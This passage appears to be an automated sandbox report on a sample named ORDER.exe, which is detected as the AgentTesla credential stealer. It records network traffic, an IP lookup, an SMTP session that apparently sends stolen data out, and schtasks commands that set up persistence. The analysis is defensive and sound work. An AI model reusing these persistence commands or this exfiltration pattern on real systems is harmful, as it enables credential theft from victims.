                                                                              Network Port Distribution

                                                                              TCP Packets

                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                              Nov 27, 2020 15:22:56.486414909 CET49727443192.168.2.554.243.164.148
                                                                              Nov 27, 2020 15:22:56.588777065 CET4434972754.243.164.148192.168.2.5
                                                                              Nov 27, 2020 15:22:56.588948965 CET49727443192.168.2.554.243.164.148
                                                                              Nov 27, 2020 15:22:56.670232058 CET49727443192.168.2.554.243.164.148
                                                                              Nov 27, 2020 15:22:56.772649050 CET4434972754.243.164.148192.168.2.5
                                                                              Nov 27, 2020 15:22:56.773108006 CET4434972754.243.164.148192.168.2.5
                                                                              Nov 27, 2020 15:22:56.773139954 CET4434972754.243.164.148192.168.2.5
                                                                              Nov 27, 2020 15:22:56.773180008 CET4434972754.243.164.148192.168.2.5
                                                                              Nov 27, 2020 15:22:56.773194075 CET4434972754.243.164.148192.168.2.5
                                                                              Nov 27, 2020 15:22:56.773192883 CET49727443192.168.2.554.243.164.148
                                                                              Nov 27, 2020 15:22:56.773238897 CET49727443192.168.2.554.243.164.148
                                                                              Nov 27, 2020 15:22:56.774386883 CET4434972754.243.164.148192.168.2.5
                                                                              Nov 27, 2020 15:22:56.813838959 CET49727443192.168.2.554.243.164.148
                                                                              Nov 27, 2020 15:22:56.821400881 CET49727443192.168.2.554.243.164.148
                                                                              Nov 27, 2020 15:22:56.923979044 CET4434972754.243.164.148192.168.2.5
                                                                              Nov 27, 2020 15:22:56.970134020 CET49727443192.168.2.554.243.164.148
                                                                              Nov 27, 2020 15:22:57.257230043 CET49727443192.168.2.554.243.164.148
                                                                              Nov 27, 2020 15:22:57.367491007 CET4434972754.243.164.148192.168.2.5
                                                                              Nov 27, 2020 15:22:57.407618046 CET49727443192.168.2.554.243.164.148
                                                                              Nov 27, 2020 15:23:07.048069000 CET49727443192.168.2.554.243.164.148
                                                                              Nov 27, 2020 15:23:07.150934935 CET4434972754.243.164.148192.168.2.5
                                                                              Nov 27, 2020 15:23:07.150958061 CET4434972754.243.164.148192.168.2.5
                                                                              Nov 27, 2020 15:23:07.151210070 CET49727443192.168.2.554.243.164.148
                                                                              Nov 27, 2020 15:23:07.151248932 CET49727443192.168.2.554.243.164.148
                                                                              Nov 27, 2020 15:23:07.860901117 CET49728587192.168.2.568.233.236.158
                                                                              Nov 27, 2020 15:23:08.004542112 CET5874972868.233.236.158192.168.2.5
                                                                              Nov 27, 2020 15:23:08.004676104 CET49728587192.168.2.568.233.236.158
                                                                              Nov 27, 2020 15:23:08.282694101 CET5874972868.233.236.158192.168.2.5
                                                                              Nov 27, 2020 15:23:08.283426046 CET49728587192.168.2.568.233.236.158
                                                                              Nov 27, 2020 15:23:08.427160978 CET5874972868.233.236.158192.168.2.5
                                                                              Nov 27, 2020 15:23:08.429059982 CET49728587192.168.2.568.233.236.158
                                                                              Nov 27, 2020 15:23:08.573081970 CET5874972868.233.236.158192.168.2.5
                                                                              Nov 27, 2020 15:23:08.574208021 CET49728587192.168.2.568.233.236.158
                                                                              Nov 27, 2020 15:23:08.735625982 CET5874972868.233.236.158192.168.2.5
                                                                              Nov 27, 2020 15:23:08.736643076 CET49728587192.168.2.568.233.236.158
                                                                              Nov 27, 2020 15:23:08.880376101 CET5874972868.233.236.158192.168.2.5
                                                                              Nov 27, 2020 15:23:08.880752087 CET49728587192.168.2.568.233.236.158
                                                                              Nov 27, 2020 15:23:09.034296989 CET5874972868.233.236.158192.168.2.5
                                                                              Nov 27, 2020 15:23:09.034858942 CET49728587192.168.2.568.233.236.158
                                                                              Nov 27, 2020 15:23:09.178555012 CET5874972868.233.236.158192.168.2.5
                                                                              Nov 27, 2020 15:23:09.178571939 CET5874972868.233.236.158192.168.2.5
                                                                              Nov 27, 2020 15:23:09.180867910 CET49728587192.168.2.568.233.236.158
                                                                              Nov 27, 2020 15:23:09.181143045 CET49728587192.168.2.568.233.236.158
                                                                              Nov 27, 2020 15:23:09.181417942 CET49728587192.168.2.568.233.236.158
                                                                              Nov 27, 2020 15:23:09.181535006 CET49728587192.168.2.568.233.236.158
                                                                              Nov 27, 2020 15:23:09.324523926 CET5874972868.233.236.158192.168.2.5
                                                                              Nov 27, 2020 15:23:09.324913979 CET5874972868.233.236.158192.168.2.5
                                                                              Nov 27, 2020 15:23:09.326756001 CET5874972868.233.236.158192.168.2.5
                                                                              Nov 27, 2020 15:23:09.377388954 CET49728587192.168.2.568.233.236.158

                                                                              UDP Packets

                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                              Nov 27, 2020 15:21:27.914763927 CET6544753192.168.2.58.8.8.8
                                                                              Nov 27, 2020 15:21:27.952754021 CET53654478.8.8.8192.168.2.5
                                                                              Nov 27, 2020 15:21:32.965508938 CET5244153192.168.2.58.8.8.8
                                                                              Nov 27, 2020 15:21:32.992604017 CET53524418.8.8.8192.168.2.5
                                                                              Nov 27, 2020 15:21:52.521518946 CET6217653192.168.2.58.8.8.8
                                                                              Nov 27, 2020 15:21:52.557221889 CET53621768.8.8.8192.168.2.5
                                                                              Nov 27, 2020 15:21:58.321516037 CET5959653192.168.2.58.8.8.8
                                                                              Nov 27, 2020 15:21:58.358633041 CET53595968.8.8.8192.168.2.5
                                                                              Nov 27, 2020 15:21:58.377063036 CET6529653192.168.2.58.8.8.8
                                                                              Nov 27, 2020 15:21:58.412472010 CET53652968.8.8.8192.168.2.5
                                                                              Nov 27, 2020 15:22:01.121975899 CET6318353192.168.2.58.8.8.8
                                                                              Nov 27, 2020 15:22:01.149048090 CET53631838.8.8.8192.168.2.5
                                                                              Nov 27, 2020 15:22:04.920420885 CET6015153192.168.2.58.8.8.8
                                                                              Nov 27, 2020 15:22:04.963738918 CET53601518.8.8.8192.168.2.5
                                                                              Nov 27, 2020 15:22:08.954406023 CET5696953192.168.2.58.8.8.8
                                                                              Nov 27, 2020 15:22:08.991322041 CET53569698.8.8.8192.168.2.5
                                                                              Nov 27, 2020 15:22:36.092958927 CET5516153192.168.2.58.8.8.8
                                                                              Nov 27, 2020 15:22:36.120320082 CET53551618.8.8.8192.168.2.5
                                                                              Nov 27, 2020 15:22:56.291981936 CET5475753192.168.2.58.8.8.8
                                                                              Nov 27, 2020 15:22:56.319000006 CET53547578.8.8.8192.168.2.5
                                                                              Nov 27, 2020 15:22:56.338557959 CET4999253192.168.2.58.8.8.8
                                                                              Nov 27, 2020 15:22:56.365775108 CET53499928.8.8.8192.168.2.5
                                                                              Nov 27, 2020 15:23:07.314687967 CET6007553192.168.2.58.8.8.8
                                                                              Nov 27, 2020 15:23:07.392752886 CET53600758.8.8.8192.168.2.5
                                                                              Nov 27, 2020 15:23:07.791810989 CET5501653192.168.2.58.8.8.8
                                                                              Nov 27, 2020 15:23:07.858406067 CET53550168.8.8.8192.168.2.5

                                                                              DNS Queries

                                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                              Nov 27, 2020 15:22:04.920420885 CET192.168.2.58.8.8.80x34c0Standard query (0)g.msn.comA (IP address)IN (0x0001)
                                                                              Nov 27, 2020 15:22:56.291981936 CET192.168.2.58.8.8.80x3c7eStandard query (0)api.ipify.orgA (IP address)IN (0x0001)
                                                                              Nov 27, 2020 15:22:56.338557959 CET192.168.2.58.8.8.80xf915Standard query (0)api.ipify.orgA (IP address)IN (0x0001)
                                                                              Nov 27, 2020 15:23:07.314687967 CET192.168.2.58.8.8.80xfe39Standard query (0)mail.vasudeva.inA (IP address)IN (0x0001)
                                                                              Nov 27, 2020 15:23:07.791810989 CET192.168.2.58.8.8.80xf368Standard query (0)mail.vasudeva.inA (IP address)IN (0x0001)

                                                                              DNS Answers

                                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                              Nov 27, 2020 15:22:04.963738918 CET8.8.8.8192.168.2.50x34c0No error (0)g.msn.comg-msn-com-nsatc.trafficmanager.netCNAME (Canonical name)IN (0x0001)
                                                                              Nov 27, 2020 15:22:56.319000006 CET8.8.8.8192.168.2.50x3c7eNo error (0)api.ipify.orgnagano-19599.herokussl.comCNAME (Canonical name)IN (0x0001)
                                                                              Nov 27, 2020 15:22:56.319000006 CET8.8.8.8192.168.2.50x3c7eNo error (0)nagano-19599.herokussl.comelb097307-934924932.us-east-1.elb.amazonaws.comCNAME (Canonical name)IN (0x0001)
                                                                              Nov 27, 2020 15:22:56.319000006 CET8.8.8.8192.168.2.50x3c7eNo error (0)elb097307-934924932.us-east-1.elb.amazonaws.com54.243.164.148A (IP address)IN (0x0001)
                                                                              Nov 27, 2020 15:22:56.319000006 CET8.8.8.8192.168.2.50x3c7eNo error (0)elb097307-934924932.us-east-1.elb.amazonaws.com23.21.126.66A (IP address)IN (0x0001)
                                                                              Nov 27, 2020 15:22:56.319000006 CET8.8.8.8192.168.2.50x3c7eNo error (0)elb097307-934924932.us-east-1.elb.amazonaws.com174.129.214.20A (IP address)IN (0x0001)
                                                                              Nov 27, 2020 15:22:56.319000006 CET8.8.8.8192.168.2.50x3c7eNo error (0)elb097307-934924932.us-east-1.elb.amazonaws.com54.225.220.115A (IP address)IN (0x0001)
                                                                              Nov 27, 2020 15:22:56.319000006 CET8.8.8.8192.168.2.50x3c7eNo error (0)elb097307-934924932.us-east-1.elb.amazonaws.com54.225.169.28A (IP address)IN (0x0001)
                                                                              Nov 27, 2020 15:22:56.319000006 CET8.8.8.8192.168.2.50x3c7eNo error (0)elb097307-934924932.us-east-1.elb.amazonaws.com54.243.161.145A (IP address)IN (0x0001)
                                                                              Nov 27, 2020 15:22:56.319000006 CET8.8.8.8192.168.2.50x3c7eNo error (0)elb097307-934924932.us-east-1.elb.amazonaws.com54.225.66.103A (IP address)IN (0x0001)
                                                                              Nov 27, 2020 15:22:56.319000006 CET8.8.8.8192.168.2.50x3c7eNo error (0)elb097307-934924932.us-east-1.elb.amazonaws.com54.204.14.42A (IP address)IN (0x0001)
                                                                              Nov 27, 2020 15:22:56.365775108 CET8.8.8.8192.168.2.50xf915No error (0)api.ipify.orgnagano-19599.herokussl.comCNAME (Canonical name)IN (0x0001)
                                                                              Nov 27, 2020 15:22:56.365775108 CET8.8.8.8192.168.2.50xf915No error (0)nagano-19599.herokussl.comelb097307-934924932.us-east-1.elb.amazonaws.comCNAME (Canonical name)IN (0x0001)
                                                                              Nov 27, 2020 15:22:56.365775108 CET8.8.8.8192.168.2.50xf915No error (0)elb097307-934924932.us-east-1.elb.amazonaws.com23.21.42.25A (IP address)IN (0x0001)
                                                                              Nov 27, 2020 15:22:56.365775108 CET8.8.8.8192.168.2.50xf915No error (0)elb097307-934924932.us-east-1.elb.amazonaws.com23.21.126.66A (IP address)IN (0x0001)
                                                                              Nov 27, 2020 15:22:56.365775108 CET8.8.8.8192.168.2.50xf915No error (0)elb097307-934924932.us-east-1.elb.amazonaws.com54.235.142.93A (IP address)IN (0x0001)
                                                                              Nov 27, 2020 15:22:56.365775108 CET8.8.8.8192.168.2.50xf915No error (0)elb097307-934924932.us-east-1.elb.amazonaws.com54.225.66.103A (IP address)IN (0x0001)
                                                                              Nov 27, 2020 15:22:56.365775108 CET8.8.8.8192.168.2.50xf915No error (0)elb097307-934924932.us-east-1.elb.amazonaws.com54.225.220.115A (IP address)IN (0x0001)
                                                                              Nov 27, 2020 15:22:56.365775108 CET8.8.8.8192.168.2.50xf915No error (0)elb097307-934924932.us-east-1.elb.amazonaws.com174.129.214.20A (IP address)IN (0x0001)
                                                                              Nov 27, 2020 15:22:56.365775108 CET8.8.8.8192.168.2.50xf915No error (0)elb097307-934924932.us-east-1.elb.amazonaws.com23.21.252.4A (IP address)IN (0x0001)
                                                                              Nov 27, 2020 15:22:56.365775108 CET8.8.8.8192.168.2.50xf915No error (0)elb097307-934924932.us-east-1.elb.amazonaws.com50.19.252.36A (IP address)IN (0x0001)
                                                                              Nov 27, 2020 15:23:07.392752886 CET8.8.8.8192.168.2.50xfe39No error (0)mail.vasudeva.invasudeva.inCNAME (Canonical name)IN (0x0001)
                                                                              Nov 27, 2020 15:23:07.392752886 CET8.8.8.8192.168.2.50xfe39No error (0)vasudeva.in68.233.236.158A (IP address)IN (0x0001)
                                                                              Nov 27, 2020 15:23:07.858406067 CET8.8.8.8192.168.2.50xf368No error (0)mail.vasudeva.invasudeva.inCNAME (Canonical name)IN (0x0001)
                                                                              Nov 27, 2020 15:23:07.858406067 CET8.8.8.8192.168.2.50xf368No error (0)vasudeva.in68.233.236.158A (IP address)IN (0x0001)

                                                                              HTTPS Packets

                                                                              TimestampSource IPSource PortDest IPDest PortSubjectIssuerNot BeforeNot AfterJA3 SSL Client FingerprintJA3 SSL Client Digest
                                                                              Nov 27, 2020 15:22:56.774386883 CET54.243.164.148443192.168.2.549727CN=*.ipify.org, OU=PositiveSSL Wildcard, OU=Domain Control Validated CN=COMODO RSA Domain Validation Secure Server CA, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GB CN=COMODO RSA Certification Authority, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GBCN=COMODO RSA Domain Validation Secure Server CA, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GB CN=COMODO RSA Certification Authority, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GB CN=COMODO RSA Certification Authority, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GBWed Jan 24 01:00:00 CET 2018 Wed Feb 12 01:00:00 CET 2014 Tue Jan 19 01:00:00 CET 2010Sun Jan 24 00:59:59 CET 2021 Mon Feb 12 00:59:59 CET 2029 Tue Jan 19 00:59:59 CET 2038771,49196-49195-49200-49199-159-158-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,03b5074b1b5d032e5620f69f9f700ff0e
                                                                              CN=COMODO RSA Domain Validation Secure Server CA, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GBCN=COMODO RSA Certification Authority, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GBWed Feb 12 01:00:00 CET 2014Mon Feb 12 00:59:59 CET 2029
                                                                              CN=COMODO RSA Certification Authority, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GBCN=COMODO RSA Certification Authority, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GBTue Jan 19 01:00:00 CET 2010Tue Jan 19 00:59:59 CET 2038

                                                                              SMTP Packets

                                                                              TimestampSource PortDest PortSource IPDest IPCommands
                                                                              Nov 27, 2020 15:23:08.282694101 CET5874972868.233.236.158192.168.2.5220-cherry.herosite.pro ESMTP Exim 4.93 #2 Fri, 27 Nov 2020 09:23:08 -0500
                                                                              220-We do not authorize the use of this system to transport unsolicited,
                                                                              220 and/or bulk e-mail.
                                                                              Nov 27, 2020 15:23:08.283426046 CET49728587192.168.2.568.233.236.158EHLO 980108
                                                                              Nov 27, 2020 15:23:08.427160978 CET5874972868.233.236.158192.168.2.5250-cherry.herosite.pro Hello 980108 [84.17.52.25]
                                                                              250-SIZE 52428800
                                                                              250-8BITMIME
                                                                              250-PIPELINING
                                                                              250-AUTH PLAIN LOGIN
                                                                              250-STARTTLS
                                                                              250 HELP
                                                                              Nov 27, 2020 15:23:08.429059982 CET49728587192.168.2.568.233.236.158AUTH login d2VhdmluZ2FjYzFAdmFzdWRldmEuaW4=
                                                                              Nov 27, 2020 15:23:08.573081970 CET5874972868.233.236.158192.168.2.5334 UGFzc3dvcmQ6
                                                                              Nov 27, 2020 15:23:08.735625982 CET5874972868.233.236.158192.168.2.5235 Authentication succeeded
                                                                              Nov 27, 2020 15:23:08.736643076 CET49728587192.168.2.568.233.236.158MAIL FROM:<weavingacc1@vasudeva.in>
                                                                              Nov 27, 2020 15:23:08.880376101 CET5874972868.233.236.158192.168.2.5250 OK
                                                                              Nov 27, 2020 15:23:08.880752087 CET49728587192.168.2.568.233.236.158RCPT TO:<weavingacc1@vasudeva.in>
                                                                              Nov 27, 2020 15:23:09.034296989 CET5874972868.233.236.158192.168.2.5250 Accepted
                                                                              Nov 27, 2020 15:23:09.034858942 CET49728587192.168.2.568.233.236.158DATA
                                                                              Nov 27, 2020 15:23:09.178571939 CET5874972868.233.236.158192.168.2.5354 Enter message, ending with "." on a line by itself
                                                                              Nov 27, 2020 15:23:09.181535006 CET49728587192.168.2.568.233.236.158.
                                                                              Nov 27, 2020 15:23:09.326756001 CET5874972868.233.236.158192.168.2.5250 OK id=1kieeT-001aiV-3J

                                                                              Code Manipulations

                                                                              Statistics

                                                                              Behavior

                                                                              Click to jump to process

                                                                              System Behavior

                                                                              General

                                                                              Start time:15:21:12
                                                                              Start date:27/11/2020
                                                                              Path:C:\Users\user\Desktop\ORDER.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:'C:\Users\user\Desktop\ORDER.exe'
                                                                              Imagebase:0xc30000
                                                                              File size:678912 bytes
                                                                              MD5 hash:47AF288AC4776F74B6460C0AF541C859
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:.Net C# or VB.NET
                                                                              Yara matches:
                                                                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.256224366.00000000042DD000.00000004.00000001.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.254397053.0000000003061000.00000004.00000001.sdmp, Author: Joe Security
                                                                              Reputation:low

                                                                              General

                                                                              Start time:15:21:20
                                                                              Start date:27/11/2020
                                                                              Path:C:\Windows\SysWOW64\schtasks.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\yqoevzHDNPFH' /XML 'C:\Users\user\AppData\Local\Temp\tmp8EFE.tmp'
                                                                              Imagebase:0x9e0000
                                                                              File size:185856 bytes
                                                                              MD5 hash:15FF7D8324231381BAD48A052F85DF04
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high

                                                                              General

                                                                              Start time:15:21:21
                                                                              Start date:27/11/2020
                                                                              Path:C:\Windows\System32\conhost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              Imagebase:0x7ff7ecfc0000
                                                                              File size:625664 bytes
                                                                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high

                                                                              General

                                                                              Start time:15:21:21
                                                                              Start date:27/11/2020
                                                                              Path:C:\Users\user\Desktop\ORDER.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:{path}
                                                                              Imagebase:0xd90000
                                                                              File size:678912 bytes
                                                                              MD5 hash:47AF288AC4776F74B6460C0AF541C859
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:.Net C# or VB.NET
                                                                              Yara matches:
                                                                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000003.00000002.506561443.00000000030B1000.00000004.00000001.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.506561443.00000000030B1000.00000004.00000001.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000003.00000002.501685208.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.506730748.0000000003106000.00000004.00000001.sdmp, Author: Joe Security
                                                                              Reputation:low

                                                                              General

                                                                              Start time:15:21:53
                                                                              Start date:27/11/2020
                                                                              Path:C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:'C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe'
                                                                              Imagebase:0x670000
                                                                              File size:678912 bytes
                                                                              MD5 hash:47AF288AC4776F74B6460C0AF541C859
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:.Net C# or VB.NET
                                                                              Yara matches:
                                                                              • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 0000000D.00000002.333784884.00000000029B1000.00000004.00000001.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000D.00000002.336092801.0000000003C2D000.00000004.00000001.sdmp, Author: Joe Security
                                                                              Antivirus matches:
                                                                              • Detection: 100%, Joe Sandbox ML
                                                                              • Detection: 73%, ReversingLabs
                                                                              Reputation:low

                                                                              General

                                                                              Start time:15:21:57
                                                                              Start date:27/11/2020
                                                                              Path:C:\Windows\SysWOW64\schtasks.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\yqoevzHDNPFH' /XML 'C:\Users\user\AppData\Local\Temp\tmpE76F.tmp'
                                                                              Imagebase:0x9e0000
                                                                              File size:185856 bytes
                                                                              MD5 hash:15FF7D8324231381BAD48A052F85DF04
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high

                                                                              General

                                                                              Start time:15:21:57
                                                                              Start date:27/11/2020
                                                                              Path:C:\Windows\System32\conhost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              Imagebase:0x7ff7ecfc0000
                                                                              File size:625664 bytes
                                                                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high

                                                                              General

                                                                              Start time:15:21:58
                                                                              Start date:27/11/2020
                                                                              Path:C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:{path}
                                                                              Imagebase:0x8a0000
                                                                              File size:678912 bytes
                                                                              MD5 hash:47AF288AC4776F74B6460C0AF541C859
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:.Net C# or VB.NET
                                                                              Yara matches:
                                                                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000011.00000002.362091691.0000000002CA1000.00000004.00000001.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000011.00000002.362091691.0000000002CA1000.00000004.00000001.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000011.00000002.360531497.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                              Reputation:low

                                                                              General

                                                                              Start time:15:22:01
                                                                              Start date:27/11/2020
                                                                              Path:C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:'C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe'
                                                                              Imagebase:0x4b0000
                                                                              File size:678912 bytes
                                                                              MD5 hash:47AF288AC4776F74B6460C0AF541C859
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:.Net C# or VB.NET
                                                                              Yara matches:
                                                                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000012.00000002.362741095.0000000003C4D000.00000004.00000001.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000012.00000002.359485793.00000000029D1000.00000004.00000001.sdmp, Author: Joe Security
                                                                              Reputation:low

                                                                              General

                                                                              Start time:15:22:08
                                                                              Start date:27/11/2020
                                                                              Path:C:\Windows\SysWOW64\schtasks.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\yqoevzHDNPFH' /XML 'C:\Users\user\AppData\Local\Temp\tmp103F.tmp'
                                                                              Imagebase:0x9e0000
                                                                              File size:185856 bytes
                                                                              MD5 hash:15FF7D8324231381BAD48A052F85DF04
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high

                                                                              General

                                                                              Start time:15:22:08
                                                                              Start date:27/11/2020
                                                                              Path:C:\Windows\System32\conhost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              Imagebase:0x7ff7ecfc0000
                                                                              File size:625664 bytes
                                                                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high

                                                                              General

                                                                              Start time:15:22:09
                                                                              Start date:27/11/2020
                                                                              Path:C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:{path}
                                                                              Imagebase:0x980000
                                                                              File size:678912 bytes
                                                                              MD5 hash:47AF288AC4776F74B6460C0AF541C859
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:.Net C# or VB.NET
                                                                              Yara matches:
                                                                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000016.00000002.501684497.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000016.00000002.506315156.0000000002DD1000.00000004.00000001.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000016.00000002.506315156.0000000002DD1000.00000004.00000001.sdmp, Author: Joe Security
                                                                              Reputation:low

                                                                              Disassembly

                                                                              Code Analysis

                                                                              Reset < >